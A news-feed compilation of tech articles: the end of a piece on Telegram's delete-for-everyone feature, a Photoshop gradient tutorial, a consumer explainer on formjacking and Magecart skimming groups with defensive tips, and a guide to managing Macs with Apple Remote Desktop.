It’s an argument in line with a libertarian way of thinking that lauds the individual as having agency — and therefore seeks to empower the person who exercises it. (And Durov is a long time advocate for libertarianism so the design choice meshes with his personal philosophy.)

On a practical level, the presence of such a nuclear delete on Telegram’s platform arguably means the only sensible option for all users that don’t want to abandon the platform is to proactive delete all private chats on a regular and rolling basis — to minimize the risk of potential future misuse and/or manipulation of their chat history. (Albeit, what doing that will do to your friendships is a whole other question.)

Users may also wish to backup their own chats because they can no longer rely on Telegram to do that for them.

While, at the other end of the spectrum — for those really wanting to be really sure they totally nuke all message trace — there are a couple of practical pitfalls that could throw a spanner in the works.  

In our tests we found Telegram’s implementation did not delete push notifications. So with recently sent and deleted messages it was still possible to view the content of a deleted message via a persisting push notification even after the message itself had been deleted within the app.

Though of course, for historical chats — which is where this feature is being aimed; aka rewriting chat history — there’s not likely to be any push notifications still floating around months or even years later to cause a headache.

The other major issue is the feature is unlikely to function properly on earlier versions of Telegram. So if you go ahead and ‘delete everywhere’ there’s no way back to try and delete a message again if it was not successfully purged everywhere because someone in the chat was still running an older version of Telegram.

Plus of course if anyone has screengrabbed your chats already there’s nothing you can do about that.

In terms of wider impact, the nuclear delete might also have the effect of encouraging more screengrabbing (or other backups) — as users hedge against future message manipulation and/or purging. Or to make sure they have a record of abuse.

Which would just create more copies of your private messages in places you can’t at all control and where they could potentially leak if the person creating the backups doesn’t secure them properly so the whole thing risks being counterproductive to privacy and security, really.

Durov claims he’s comfortable with the contents of his own Telegram inbox, writing on his channel that “there’s not much I would want to delete for both sides” — while simultaneously claiming that “for the first time in 23 years of private messaging, I feel truly free and in control”.

The truth is the sensation of control he’s feeling is fleeting and relative.

In another test we performed we were able to delete private messages from Durov’s own inbox, including missives we’d sent to him in a private chat and one he’d sent us. (At least, in so far as we could tell — not having access to Telegram servers to confirm. But the delete option was certainly offered and content (both ours and his) disappeared from our end after we hit the relevant purge button.)

Only Durov could confirm for sure that the messages have gone from his end too. And most probably he’d have trouble doing so as it would require incredible memory for minor detail.

But the point is if the deletion functioned as Telegram claims it does, purging equally at both ends, then Durov was not in control at all because we reached right into his inbox and selectively rubbed some stuff out. He got no say at all.

That’s a funny kind of agency and a funny kind of control.

One thing certainly remains in Telegram users’ control: The ability to choose your friends — and choose who you talk to privately.

Turns out you need to exercise that power very wisely.

Otherwise, well, other encrypted messaging apps are available.


Read Full Article

How to Create a Custom Gradient Using Photoshop CC


create-gradient-photoshop

Photoshop CC is a great tool for creating gradients. By simply blending two colors together, you can add some visual “pop” to your images. Photoshop has some built-in options for this, but what if you want to create a gradient from scratch?

In this article, we’ll walk you through how to create a custom gradient using Photoshop CC in four simple steps.

Step 1: Set Up Your Canvas

Creating Custom Gradient in Photoshop Opening Screen

First, open Photoshop CC. For this tutorial you don’t need a custom template, so we can go with Photoshop’s default canvas size.

Creating Custom Gradient in Photoshop Gradient Tool

Once you’ve opened your canvas, make sure your Gradient tool is active, seen here highlighted in red. After it’s active, pick two colors you want in your gradient, using your color swatches at the bottom of the toolbar. For this tutorial we’re going to go with a bright blue and purple, to create a “neon” look.

Step 2: Using the Gradient Editor

Creating Custom Gradient in Photoshop Editing a Gradient

To customize your gradient, go to the top left-hand corner of your workspace and double-click on the color bar to access your Gradient Editor. The Gradient Editor is a powerful, simple tool and a one-stop shop for all your customization needs.

Creating Custom Gradient in Photoshop Gradient Editor

At the top of the editor you’ll see a row of Presets that come with Photoshop CC. Along the right side of the editor are options to LoadSave, and create New gradients. At the bottom of the editor are the tools to customize your gradient.

There are two different styles of gradients you can create. The first one we’re going to design is called a Solid gradient. You can see this option in the dropdown menu where it says Gradient Type: Solid in the middle of the editor. Make sure this option is selected before you begin.

Step 3: Create a Solid Gradient

Creating Custom Gradient in Photoshop Color Stop

Photoshop’s default gradient transitions between two colors, but what if you want to transition between three? To do this, click on one of the Color Stops located on the left and right ends of the color slider. For this tutorial we’re going to adjust the left Color Stop by dragging it towards the center of the bar. Where it sits is the spot that my third color will blend into the others.

To pick a third color, double-click on the Color Stop. It will open up your Color Picker and allow you to pick a hue of your choice. Once selected, click OK. Photoshop will add the third color to your slider.

Creating Custom Gradient in Photoshop Midpoint

These colors are looking good, but what if you want to adjust where they blend on the page, instead of an even three-way split? To do this, click and drag your Color Midpoint across the slider, to change your ratios.

You can also adjust the Smoothness of how you blend these colors together. For this tutorial I’m going to keep the smoothness to 100 percent, but if you want a “choppier” look pull that slider to a smaller percentage.

Creating Custom Gradient in Photoshop Adjusting Smoothness

Next, click OK to exit the Gradient Editor. Then go to your gradient style buttons, found in the top left-hand corner of your workspace next to your color bar. There are five different styles you can use, but they all work in the same way.

To apply them to your image, click on the gradient type of your choice, then click and drag across your page. When you release, Photoshop will apply the gradient in the direction you’ve indicated. We’ve talked about this technique before in our look at how to create a podcast cover using Photoshop.

Try Out the Different Types of Gradient

The first type of gradient we’re going to try is the Linear Gradient, which looks pretty standard.

Creating Custom Gradient in Photoshop Linear Gradient

You can also try a Radial Gradient, which looks like the glow from a spotlight. I personally use this type of a gradient to create the “glow” that you see around a star in space.

Creating Custom Gradient in Photoshop Radial Gradient

If you want a hard edge of light, the Angle Gradient is a really good option.

Creating Custom Gradient in Photoshop Angle Gradient

Reflective Gradients are good for liquid surfaces and sunsets.

Creating Custom Gradient in Photoshop Reflected Gradient

Diamond Gradients are kind of funky, but they can be used as a spotlight glare or the reflective edge on a gemstone.

Creating Custom Gradient in Photoshop Diamond Gradient

This is all you have to do to create a customized, solid gradient in Photoshop. It’s both incredibly simple and easy to remember. Before we wrap up this tutorial, however, there’s one more gradient you can create. It’s called a Noise gradient and we’re going to briefly touch on it.

Step 4: Create a Noise Gradient

Creating Custom Gradient in Photoshop Noise

To create a Noise gradient, double-click on your color bar to access your Gradient Editor. Next to Gradient Type, click the dropdown menu to select Noise. You’ll immediately see a new color slider show up on the bottom of your editor, along with two sections to adjust Roughness and Color Model.

Beneath Color Model are three sliders for the individual color channels. By sliding the markers along each channel, you can adjust how many colors show up in your gradient, what shade they are, and the brightness.

Creating Custom Gradient in Photoshop Adjusting Noise

You can also adjust the contrast between these colors by using Roughness. A high percentage of roughness means that the gradient will have very distinct lines of color. A low percentage means that the colors will be blended.

Creating Custom Gradient in Photoshop Adjusting Roughness

Once these specs are calibrated, click OK to exit the Gradient Editor. Choose your gradient style in the left-hand corner of your workspace, then click and drag your gradient tool across your canvas to check out the different results.

Creating Custom Gradient in Photoshop Rough Radial Gradient

You’ll immediately notice that noise gradients look very different from solid ones. The Radial Gradient is a good example of this.

How to Save Your Gradient as a Preset

Creating Custom Gradient in Photoshop New Swatch

Let’s say you really like the gradient you created and you want to use it again on another image. To do this, go to Gradient Editor > New. This will add a new swatch to the gradient you created in the Presets window.

Creating Custom Gradient in Photoshop Save Swatch

After you create your swatch, click Save. Give your new gradient a meaningful name, then click on Save again.

Now that your preset is saved, how do you access it for other projects? Make sure your Gradient tool is active, then click on the color bar to access the Presets window. After that, click on the “gear” icon, seen here in red.

Creating Custom Gradient in Photoshop Load Gradient

Next, click Load Gradients. This will bring up your list of gradients, where you can select your custom swatch. Once selected, click OK.

Customize Your Tools in Photoshop CC

Now that you know how to create a custom gradient in Photoshop, you’re ready to get started. But gradients aren’t the only tool you can customize using this program. Thankfully, we have previously explained how to create a custom brush in Photoshop CC.

Read the full article: How to Create a Custom Gradient Using Photoshop CC


Read Full Article

What Is Formjacking and How Can You Avoid It?


formjacking

2017 was the year of ransomware. 2018 was all about cryptojacking. 2019 is shaping up as the year of formjacking.

Drastic decreases in the value of cryptocurrencies such as Bitcoin and Monero mean cybercriminals are looking elsewhere for fraudulent profits. What better place than to steal your banking information straight from the product order form, before you even hit submit. That’s right; they’re not breaking into your bank. Attackers are lifting your data before it even gets that far.

Here’s what you need to know about formjacking.

What Is Formjacking?

A formjacking attack is a way for a cybercriminal to intercept your banking information direct from an e-commerce site.

According to the Symantec Internet Security Threat Report 2019, formjackers compromised 4,818 unique websites every month in 2018. Over the course of the year, Symantec blocked over 3.7 million formjacking attempts.

Furthermore, over 1 million of those formjacking attempts came during the final two months of 2018—ramping up towards the November Black Friday weekend, and onward throughout the December Christmas shopping period.

So, how does a formjacking attack work?

Formjacking involves inserting malicious code into the website of an e-commerce provider. The malicious code steals payment information such as card details, names, and other personal information commonly used while shopping online. The stolen data is sent to a server for reuse or sale, the victim unaware that their payment information is compromised.

All in all, it seems basic. It is far from it. One hacker used 22 lines of code to modify scripts running on the British Airways site. The attacker stole 380,000 credit card details, netting over £13 million in the process.

Therein lies the allure. Recent high-profile attacks on British Airways, TicketMaster UK, Newegg, Home Depot, and Target share a common denominator: formjacking.

Who Is Behind the Formjacking Attacks?

Pinpointing a single attacker when so many unique websites fall victim to a single attack (or at least, style of attack) is always difficult for security researchers. As with other recent cybercrime waves, there is no single perpetrator. Instead, the majority of formjacking stems from Magecart groups.

The name stems from the software the hacking groups use to inject malicious code into vulnerable e-commerce sites. It does cause some confusion, and you often see Magecart used as a singular entity to describe a hacking group. In reality, numerous Magecart hacking groups attack different targets, using different techniques.

Yonathan Klijnsma, a threat researcher at RiskIQ, tracks the various Magecart groups. In a recent report published with risk intelligence firm Flashpoint, Klijnsma details six distinct groups using Magecart, operating under the same moniker to avoid detection.

The Inside Magecart report [PDF] explores what makes each of the leading Magecart groups unique:

  • Group 1 & 2: Attack a wide range of targets, use automated tools to breach and skim sites; monetizes stolen data using a sophisticated reshipping scheme.
  • Group 3: Very high volume of targets, operates a unique injector and skimmer.
  • Group 4: One of the most advanced groups, blends in with victim sites using a range of obfuscation tools.
  • Group 5: Targets third-party suppliers to breach multiple targets, links to the Ticketmaster attack.
  • Group 6: Selective targeting of extremely high-value websites and services, including the British Airways and Newegg attacks.

As you can see, the groups are shadowy and use different techniques. Furthermore, the Magecart groups are competing to create an effective credential stealing product. The targets are different, as some groups specifically aim for high-value returns. But for the most part, they’re swimming in the same pool. (These six are not the only Magecart groups out there.)

Advanced Group 4

The RiskIQ research paper identifies Group 4 as “advanced.” What does that mean in the context of formjacking?

Group 4 attempts to blend in with the website it is infiltrating. Instead of creating additional unexpected web traffic that a network administrator or security researcher might spot, Group 4 tries to generate “natural” traffic. It does this by registering domains “mimicking ad providers, analytics providers, victim’s domains, and anything else” that helps them hide in plain sight.

In addition, Group 4 regularly alters the appearance of its skimmer, how its URLs appear, the data exfiltration servers, and more. There’s more.

The Group 4 formjacking skimmer first validates the checkout URL on which it is functioning. Then, unlike all other groups, the Group 4 skimmer replaces the payment form with one of their own, serving the skimming form directly to the customer (read: victim). Replacing the form “standardizes the data to pull out,” making it easier to reuse or sell on.

RiskIQ concludes that “these advanced methods combined with sophisticated infrastructure indicate a likely history in the banking malware ecosystem . . . but they transferred their MO [Modus Operandi] toward card skimming because it is a lot easier than banking fraud.”

How Do Formjacking Groups Make Money?

Most of the time, the stolen credentials are sold online. There are numerous international and Russian-language carding forums with long listings of stolen credit card and other banking information. They’re not the illicit, seedy type of site you might imagine.

Some of the most popular carding sites present themselves as a professional outfit—perfect English, perfect grammar, customer services; everything you expect from a legitimate e-commerce site.

magecart formjacking riskiq research

Magecart groups are also reselling their formjacking packages to other would-be cybercriminals. Analysts for Flashpoint found adverts for customized formjacking skimmer kits on a Russian hacking forum. The kits range from around $250 to $5,000 depending on complexity, with vendors displaying unique pricing models.

For instance, one vendor was offering budget versions of professional tools seen the high-profile formjacking attacks.

Formjacking groups also offer access to compromised websites, with prices starting as low as $0.50, depending on the website ranking, the hosting, and other factors. The same Flashpoint analysts discovered around 3,000 breached websites on sale on the same hacking forum.

Furthermore, there were “more than a dozen sellers and hundreds of buyers” operating on the same forum.

How Can You Stop a Formjacking Attack?

Magecart formjacking skimmers use JavaScript to exploit customer payment forms. Using a browser-based script blocker is usually enough to stop a formjacking attack stealing your data.

Once you add one of the script blocking extensions to your browser, you will have significantly more protection against formjacking attacks. It isn’t perfect though.

The RiskIQ report suggests avoiding smaller sites that do not have the same level of protection as a major site. Attacks on British Airways, Newegg, and Ticketmaster suggest that advice isn’t entirely sound. Don’t discount it though. A mom and pop e-commerce site is more likely to host a Magecart formjacking script.

Another mitigation is Malwarebytes Premium. Malwarebytes Premium offers real-time system scanning and in-browser protection. The Premium version protects against precisely this sort of attack. Unsure about upgrading? Here are five excellent reasons to upgrade to Malwarebytes Premium!

Read the full article: What Is Formjacking and How Can You Avoid It?


Read Full Article

How to Use Apple Remote Desktop to Manage Mac Computers


apple-remote-desktop

Apple Remote Desktop is a powerful app that lets you control all your Macs in one handy place. It takes enterprise-level management tools and puts them in your hands. You can use it to screen share, send files, install apps, run scripts, and more.

Take a look and see how Apple Remote Desktop can change how you manage a big group of Macs.

Adding Machines to Apple Remote Desktop

When you open Apple Remote Desktop for the first time, your first task is to find the Macs on your network and add them. If you know their IP addresses, you can easily enter them.

Most people, however, don’t have those written down anywhere, and if you use DHCP, they can change. Fortunately, Apple Remote Desktop has a built-in feature to scan your network for your Macs.

Scanner

Apple Remote Desktop's Scanner Section

The easiest way to do this is with Scanner. Select it on the left-hand side, and you’ll see a dropdown menu with a number of different ways to locate computers on your network. Each item will scan your network and display the hostname, IP address, and other information of devices on your network:

  • Bonjour: Displays all the Macs connected to your network using Bonjour.
  • Local Network: Displays all the devices on your local network, regardless of what they are or how they’re connected.
  • Network Range: Displays all the devices found in-between a certain IP range.
  • Network Address: Displays a device connected to a specific IP.
  • File Import: Import a list of IPs and search your network for them.
  • Task Server and Directory Server: Really only used in an office or enterprise environment, these options let you take a list from a server that you have and scan based on that.

If you’re connecting to a group of Macs at home, you’ll most likely be able to find them all over Bonjour, or Local Network. Keep in mind that Local Network will display all of your network devices, whereas Bonjour will only display the ones that are Bonjour-enabled (like Macs).

Connecting to the Machines

Once you’ve found your machines in Scanner, you should be able to click on their hostname to connect to them. You will then be prompted to type in an administrator’s account and password. You must do this in order to connect to that machine. After you’ve done so, you’ll be able to see that computer under All Computers on the left-hand side.

Now that you have a list of machines, what can you actually do with Apple Remote Desktop?

Observe and Control

The two actions you ‘ll do most with the Apple Remote Desktop client sound Orwellian when said together, but they’re almost exactly the same. Both buttons are in the top-left corner of the main window.

Observe allows you to simply monitor another user’s screen in real-time, while Control lets you use their cursor and keyboard input as well. A third action, Curtain, lets you lock down the user’s machine and display a message explaining why. You will still have full control of the target machine, but the user will only see the message.

The Interact menu bar tab lets you perform even more administrative actions. You can send messages, chat, and lock or unlock the screen.

Send Remote Commands

Use the Manage menu bar item to Open Application, put the computer to Sleep, Wake it up, Log Out Current User, Restart it, or do a Shutdown. Note that you should be careful with remote Shutdown, since you cannot start the machine up again remotely.

You can also use the Unix button to send bash shell commands. This lets you choose to send the commands either as the currently logged-in user, or a user of your choice such as root. If you want to see the output of the command, check the Display all output box, then check the results in the History section on the left-hand side.

See our beginner’s guide to the Mac Terminal if you’re new to this.

Install Packages

The Copy and Install buttons in the main window will allow you to transfer or install files directly on a target machine. You can use this to install the best Mac apps in the /Applications folders of all your machines at once.

Select a machine, hit either button, and choose the file to copy or the package to install. You can see whether or not the transfer succeeded under History.

Install Screen for Apple Remote Desktop

Do a Spotlight Search

If you hit the Spotlight button, you can search the target machine for a certain file, copy it to your computer, or delete it. In the Spotlight Search window, select the Plus button to search for certain criteria.

View Reports

Use the Reports button to get current reports on all your Macs. You can search for a system overview, currently installed software, hardware specs, and more. Once you get the output, you can save the file to refer to later.

Apple Remote Desktops' Report window

Organize Your Computers and Customize Your Preferences

You can use labels to categorize your machines by area or department. Double-click any machine in your list, hit Edit in their info window, and then choose a label color. When you’re done, go to View > View Options, check Label, and then click the Label tab in the main window to organize all your machines by their label colors.

Apple Remote Desktop's Label Features

In Preferences, you can change various settings and customize the appearance.

The most important action you can take is set up a Task Server. You can use a Task Server to set up installations and commands to be performed on Macs that are currently offline.

Apple Remote Desktop will communicate with the Task Server when you run a command and store a copy of the command on the Server. Afterwards, the Server will check in periodically, and run the command on the target machine once it comes back online.

Control All Your Devices Remotely

Now that you’ve gotten a taste for Apple Remote Desktop’s remote control and the power it bestows, you have the power to manage all your computers more easily than ever. If this tool didn’t do it for you, we’ve shown other ways to remote access your Mac too.

Next, why not learn how to control your iPhone from your Mac by utilizing some third-party options to communicate between iOS and macOS? Soon you’ll be able to control all your devices, no matter where you are.

Read the full article: How to Use Apple Remote Desktop to Manage Mac Computers


Read Full Article